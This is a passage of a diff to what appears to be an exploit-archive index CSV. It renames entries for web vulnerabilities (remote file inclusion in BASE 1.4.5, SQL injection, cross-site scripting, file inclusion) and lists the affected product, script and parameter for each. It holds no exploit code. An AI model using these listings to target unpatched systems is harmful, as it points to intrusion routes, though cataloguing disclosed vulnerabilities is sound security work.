ADManager Plus 5.2 Build 5210 - 'domainName' Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0 +36665,platforms/php/webapps/36665.txt,"Simple Groupware 0.742 - 'export' Cross-Site Scripting",2012-02-07,"Infoserve Security Team",php,webapps,0 +36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - 'Operation' Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0 +36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - 'domainName' Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0 36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 - 'administrator.php' Cross-Site Scripting",2012-02-07,"Chokri B.A",php,webapps,0 36671,platforms/php/webapps/36671.txt,"WordPress Plugin All In One WP Security & Firewall 3.9.0 - SQL Injection",2015-04-08,"Claudio Viviani",php,webapps,80 36674,platforms/php/webapps/36674.txt,"WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting",2015-04-08,"Kacper Szurek",php,webapps,80 @@ -35662,85 +35663,85 @@ id,file,description,date,author,platform,type,port 36678,platforms/jsp/webapps/36678.txt,"ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",jsp,webapps,0 36683,platforms/php/webapps/36683.txt,"Dolibarr CMS 3.x - 'adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",php,webapps,0 36684,platforms/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,java,webapps,0 -36685,platforms/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script redir Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 -36686,platforms/php/webapps/36686.txt,"CubeCart 3.0.20 - admin/login.php goto Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 -36687,platforms/php/webapps/36687.txt,"CubeCart 3.0.20 - switch.php r Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 +36685,platforms/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script 'redir' Arbitrary Site Redirects",2012-02-10,"Aung Khant",php,webapps,0 +36686,platforms/php/webapps/36686.txt,"CubeCart 3.0.20 - 'admin/login.php?goto' Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 +36687,platforms/php/webapps/36687.txt,"CubeCart 3.0.20 - 'switch.php?r' Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h - 'path_to_admin/product.php' Cross-Site Request Forgery",2012-02-10,DisK0nn3cT,php,webapps,0 36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0 36691,platforms/php/webapps/36691.txt,"WordPress Plugin Windows Desktop and iPhone Photo Uploader - Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 -36693,platforms/php/webapps/36693.txt,"RabbitWiki - 'title' Parameter Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 +36693,platforms/php/webapps/36693.txt,"RabbitWiki - 'title' Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 36694,platforms/php/webapps/36694.txt,"eFront Community++ 3.6.10 - SQL Injection / Multiple HTML Injection Vulnerabilities",2012-02-12,"Benjamin Kunz Mejri",php,webapps,0 -36695,platforms/php/webapps/36695.txt,"Zimbra - 'view' Parameter Cross-Site Scripting",2012-02-13,sonyy,php,webapps,0 -36696,platforms/php/webapps/36696.txt,"Nova CMS - administrator/modules/moduleslist.php id Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36697,platforms/php/webapps/36697.txt,"Nova CMS - optimizer/index.php fileType Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36698,platforms/php/webapps/36698.txt,"Nova CMS - includes/function/gets.php Filename Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36699,platforms/php/webapps/36699.txt,"Nova CMS - includes/function/usertpl.php conf[blockfile] Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36702,platforms/php/webapps/36702.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_db_setup.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36703,platforms/php/webapps/36703.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_common.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36704,platforms/php/webapps/36704.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_display.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36705,platforms/php/webapps/36705.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_form.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36706,platforms/php/webapps/36706.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_main.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36707,platforms/php/webapps/36707.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_local_rules.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36708,platforms/php/webapps/36708.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_logout.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36709,platforms/php/webapps/36709.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_main.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36710,platforms/php/webapps/36710.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_maintenance.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36711,platforms/php/webapps/36711.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_payload.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36712,platforms/php/webapps/36712.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - help/base_setup_help.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36713,platforms/php/webapps/36713.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_action.inc.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36714,platforms/php/webapps/36714.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_cache.inc.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36715,platforms/php/webapps/36715.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_db.inc.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36716,platforms/php/webapps/36716.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_include.inc.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36717,platforms/php/webapps/36717.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_output_html.inc.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36718,platforms/php/webapps/36718.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_output_query.inc.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36719,platforms/php/webapps/36719.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_state_criteria.inc.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36720,platforms/php/webapps/36720.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_state_query.inc.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36721,platforms/php/webapps/36721.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - setup/base_conf_contents.php Multiple Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36722,platforms/php/webapps/36722.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_state_common.inc.php GLOBALS[user_session_path] Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36723,platforms/php/webapps/36723.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - setup/setup2.php ado_inc_PHP Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36724,platforms/php/webapps/36724.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36725,platforms/php/webapps/36725.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_qry_alert.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36726,platforms/php/webapps/36726.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_qry_common.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36727,platforms/php/webapps/36727.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_alerts.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36728,platforms/php/webapps/36728.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_class.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36729,platforms/php/webapps/36729.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_common.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36730,platforms/php/webapps/36730.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ipaddr.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36731,platforms/php/webapps/36731.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_iplink.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36732,platforms/php/webapps/36732.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ports.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36695,platforms/php/webapps/36695.txt,"Zimbra - 'view' Cross-Site Scripting",2012-02-13,sonyy,php,webapps,0 +36696,platforms/php/webapps/36696.txt,"Nova CMS - 'administrator/modules/moduleslist.php?id' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36697,platforms/php/webapps/36697.txt,"Nova CMS - 'optimizer/index.php?fileType' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36698,platforms/php/webapps/36698.txt,"Nova CMS - 'includes/function/gets.php?Filename' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36699,platforms/php/webapps/36699.txt,"Nova CMS - 'includes/function/usertpl.php?conf[blockfile]' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36702,platforms/php/webapps/36702.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_db_setup.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36703,platforms/php/webapps/36703.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_common.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36704,platforms/php/webapps/36704.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_display.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36705,platforms/php/webapps/36705.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_form.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36706,platforms/php/webapps/36706.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_main.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36707,platforms/php/webapps/36707.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_local_rules.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36708,platforms/php/webapps/36708.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_logout.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36709,platforms/php/webapps/36709.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_main.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36710,platforms/php/webapps/36710.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_maintenance.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36711,platforms/php/webapps/36711.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_payload.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36712,platforms/php/webapps/36712.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'help/base_setup_help.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36713,platforms/php/webapps/36713.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_action.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36714,platforms/php/webapps/36714.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_cache.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36715,platforms/php/webapps/36715.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_db.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36716,platforms/php/webapps/36716.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_include.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36717,platforms/php/webapps/36717.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_output_html.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36718,platforms/php/webapps/36718.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_output_query.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36719,platforms/php/webapps/36719.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_state_criteria.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36720,platforms/php/webapps/36720.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_state_query.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36721,platforms/php/webapps/36721.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'setup/base_conf_contents.php' Multiple Remote File Inclusions",2012-02-11,indoushka,php,webapps,0 +36722,platforms/php/webapps/36722.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'includes/base_state_common.inc.php?GLOBALS[user_session_path]' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36723,platforms/php/webapps/36723.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'setup/setup2.php?ado_inc_PHP' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36724,platforms/php/webapps/36724.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_ag_main.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36725,platforms/php/webapps/36725.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_qry_alert.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36726,platforms/php/webapps/36726.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_qry_common.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36727,platforms/php/webapps/36727.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_alerts.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36728,platforms/php/webapps/36728.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_class.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36729,platforms/php/webapps/36729.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_common.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36730,platforms/php/webapps/36730.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_ipaddr.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36731,platforms/php/webapps/36731.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_iplink.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36732,platforms/php/webapps/36732.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_ports.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36733,platforms/php/webapps/36733.txt,"WordPress Plugin WP Mobile Edition 2.7 - Remote File Disclosure",2015-04-13,"Khwanchai Kaewyos",php,webapps,0 36735,platforms/php/webapps/36735.txt,"WordPress Plugin Duplicator 0.5.14 - SQL Injection / Cross-Site Request Forgery",2015-04-13,"Claudio Viviani",php,webapps,0 36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0 36738,platforms/php/webapps/36738.txt,"WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 - Arbitrary File Upload (1)",2015-04-13,"Claudio Viviani",php,webapps,0 36761,platforms/php/webapps/36761.txt,"WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery / Arbitrary File Deletion",2015-04-14,LiquidWorm,php,webapps,80 -36752,platforms/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_sensor.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_time.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_uaddr.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36752,platforms/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_sensor.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_time.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_uaddr.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36751,platforms/php/webapps/36751.txt,"WordPress Plugin Video Gallery 2.8 - SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80 -36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_user.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_user.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'index.php' base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/base_useradmin.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/index.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'admin/base_useradmin.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'admin/index.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted Arbitrary File Upload / Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0 36762,platforms/php/webapps/36762.txt,"WordPress Plugin MiwoFTP 1.0.5 - Multiple Cross-Site Request Forgery / Cross-Site Scripting Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80 36763,platforms/php/webapps/36763.txt,"WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery / Arbitrary File Creation / Remote Code Execution",2015-04-14,LiquidWorm,php,webapps,80 -36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 - 'target' Parameter HTML Injection",2012-02-13,sonyy,php,webapps,0 -36765,platforms/php/webapps/36765.txt,"Powie pFile 1.02 - pfile/kommentar.php filecat Parameter Cross-Site Scripting",2012-02-13,indoushka,php,webapps,0 -36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 - pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0 -36768,platforms/php/webapps/36768.txt,"ProWiki - 'id' Parameter Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 -36769,platforms/php/webapps/36769.txt,"STHS v2 Web Portal - prospects.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 -36770,platforms/php/webapps/36770.txt,"STHS v2 Web Portal - prospect.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 -36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal - team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 +36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 - 'target' HTML Injection",2012-02-13,sonyy,php,webapps,0 +36765,platforms/php/webapps/36765.txt,"Powie pFile 1.02 - 'pfile/kommentar.php?filecat' Cross-Site Scripting",2012-02-13,indoushka,php,webapps,0 +36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 - 'pfile/file.php?id' SQL Injection",2012-02-13,indoushka,php,webapps,0 +36768,platforms/php/webapps/36768.txt,"ProWiki - 'id' Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 +36769,platforms/php/webapps/36769.txt,"STHS v2 Web Portal - 'prospects.php?team' SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 +36770,platforms/php/webapps/36770.txt,"STHS v2 Web Portal - 'prospect.php?team' SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 +36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal - 'team.php?team' SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 36772,platforms/cgi/webapps/36772.txt,"EditWrxLite CMS - 'wrx.cgi' Remote Command Execution",2012-02-13,chippy1337,cgi,webapps,0 36774,platforms/php/webapps/36774.txt,"WordPress Plugin MiwoFTP 1.0.5 - Arbitrary File Download (1)",2015-04-15,"Necmettin COSKUN",php,webapps,0 36807,platforms/php/webapps/36807.txt,"GoAutoDial 3.3-1406088000 - Multiple Vulnerabilities",2015-04-21,"Chris McCurley",php,webapps,80 36777,platforms/php/webapps/36777.txt,"WordPress Plugin Ajax Store Locator 1.2 - SQL Injection",2015-04-16,"Claudio Viviani",php,webapps,80 -36784,platforms/php/webapps/36784.txt,"11in1 CMS 1.2.1 - 'index.php class' Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 -36785,platforms/php/webapps/36785.txt,"11in1 CMS 1.2.1 - 'admin/index.php class' Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 +36784,platforms/php/webapps/36784.txt,"11in1 CMS 1.2.1 - 'index.php?class' Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 +36785,platforms/php/webapps/36785.txt,"11in1 CMS 1.2.1 - 'admin/index.php?class' Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36786,platforms/php/webapps/36786.txt,"11in1 CMS 1.2.1 - Cross-Site Request Forgery (Admin Password)",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36787,platforms/php/webapps/36787.txt,"LEPTON 1.1.3 - Cross-Site Scripting",2012-02-15,"High-Tech Bridge SA",php,webapps,0 -36790,platforms/php/webapps/36790.txt,"Tube Ace - 'q' Parameter Cross-Site Scripting",2012-02-16,"Daniel Godoy",php,webapps,0 +36790,platforms/php/webapps/36790.txt,"Tube Ace - 'q' Cross-Site Scripting",2012-02-16,"Daniel Godoy",php,webapps,0 36791,platforms/php/webapps/36791.txt,"CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injections",2012-02-16,tempe_mendoan,php,webapps,0 -36792,platforms/php/webapps/36792.txt,"Pandora FMS 4.0.1 - 'sec2' Parameter Local File Inclusion",2012-02-17,"Ucha Gobejishvili",php,webapps,0 -36793,platforms/php/webapps/36793.txt,"ButorWiki 3.0 - 'service' Parameter Cross-Site Scripting",2012-02-17,sonyy,php,webapps,0 +36792,platforms/php/webapps/36792.txt,"Pandora FMS 4.0.1 - 'sec2' Local File Inclusion",2012-02-17,"Ucha Gobejishvili",php,webapps,0 +36793,platforms/php/webapps/36793.txt,"ButorWiki 3.0 - 'service' Cross-Site Scripting",2012-02-17,sonyy,php,webapps,0 36795,platforms/ios/webapps/36795.txt,"Wifi Drive Pro 1.2 iOS - Local File Inclusion",2015-04-21,Vulnerability-Lab,ios,webapps,0 36796,platforms/ios/webapps/36796.txt,"Photo Manager Pro 4.4.0 iOS - Local File Inclusion",2015-04-21,Vulnerability-Lab,ios,webapps,0 36797,platforms/ios/webapps/36797.txt,"Mobile Drive HD 1.8 - Local File Inclusion",2015-04-21,Vulnerability-Lab,ios,webapps,0 @@ -35751,24 +35752,24 @@ id,file,description,date,author,platform,type,port 36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure",2015-04-21,"KnocKout inj3ct0r",php,webapps,0 36805,platforms/php/webapps/36805.txt,"WordPress Plugin Community Events 1.3.5 - SQL Injection",2015-04-21,"Hannes Trunde",php,webapps,0 36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80 -36848,platforms/php/webapps/36848.txt,"Tiki Wiki CMS Groupware - 'url' Parameter URI redirection",2012-02-18,sonyy,php,webapps,0 -36849,platforms/php/webapps/36849.txt,"VOXTRONIC Voxlog Professional 3.7.x - get.php v Parameter Arbitrary File Access",2012-02-20,"J. Greil",php,webapps,0 -36850,platforms/php/webapps/36850.txt,"VOXTRONIC Voxlog Professional 3.7.x - userlogdetail.php idclient Parameter SQL Injection",2012-02-20,"J. Greil",php,webapps,0 +36848,platforms/php/webapps/36848.txt,"Tiki Wiki CMS Groupware - 'url' URI Redirection",2012-02-18,sonyy,php,webapps,0 +36849,platforms/php/webapps/36849.txt,"VOXTRONIC Voxlog Professional 3.7.x - 'get.php?v' Arbitrary File Access",2012-02-20,"J. Greil",php,webapps,0 +36850,platforms/php/webapps/36850.txt,"VOXTRONIC Voxlog Professional 3.7.x - 'userlogdetail.php?idclient' SQL Injection",2012-02-20,"J. Greil",php,webapps,0 36851,platforms/php/webapps/36851.txt,"F*EX 20100208/20111129-2 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-20,muuratsalo,php,webapps,0 36852,platforms/php/webapps/36852.txt,"TestLink - Multiple SQL Injections",2012-02-20,"Juan M. Natal",php,webapps,0 36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload",2015-04-22,"CWH Underground",php,webapps,80 36821,platforms/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution",2015-04-23,"TUNISIAN CYBER",php,webapps,0 36823,platforms/php/webapps/36823.txt,"WordPress Plugin Ultimate Product Catalogue - Unauthenticated SQL Injection (1)",2015-04-23,"Felipe Molina",php,webapps,0 36824,platforms/php/webapps/36824.txt,"WordPress Plugin Ultimate Product Catalogue - Unauthenticated SQL Injection (2)",2015-04-23,"Felipe Molina",php,webapps,0 -36830,platforms/php/webapps/36830.txt,"Impulsio CMS - 'id' Parameter SQL Injection",2012-02-16,sonyy,php,webapps,0 -36834,platforms/php/webapps/36834.txt,"Joomla! Component com_x-shop - 'idd' Parameter SQL Injection",2012-02-18,KedAns-Dz,php,webapps,0 +36830,platforms/php/webapps/36830.txt,"Impulsio CMS - 'id' SQL Injection",2012-02-16,sonyy,php,webapps,0 +36834,platforms/php/webapps/36834.txt,"Joomla! Component com_x-shop - 'idd' SQL Injection",2012-02-18,KedAns-Dz,php,webapps,0 36835,platforms/php/webapps/36835.txt,"Joomla! Component com_xcomp - Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0 36844,platforms/php/webapps/36844.txt,"WordPress 4.2 - Persistent Cross-Site Scripting",2015-04-27,klikki,php,webapps,0 36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x / < 3.2.x / < 3.3.x - Persistent Cross-Site Scripting",2015-04-27,"Adam Ziaja",php,webapps,0 -36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 - 'DOC' Parameter Directory Traversal",2009-04-17,MustLive,cgi,webapps,0 -36853,platforms/php/webapps/36853.txt,"Dolphin 7.0.x - viewFriends.php Multiple Parameter Cross-Site Scripting",2012-02-21,"Aung Khant",php,webapps,0 -36854,platforms/php/webapps/36854.txt,"Dolphin 7.0.x - explanation.php explain Parameter Cross-Site Scripting",2012-02-21,"Aung Khant",php,webapps,0 -36856,platforms/php/webapps/36856.txt,"Joomla! Component com_xvs - 'Controller' Parameter Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0 +36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 - 'DOC' Directory Traversal",2009-04-17,MustLive,cgi,webapps,0 +36853,platforms/php/webapps/36853.txt,"Dolphin 7.0.x - 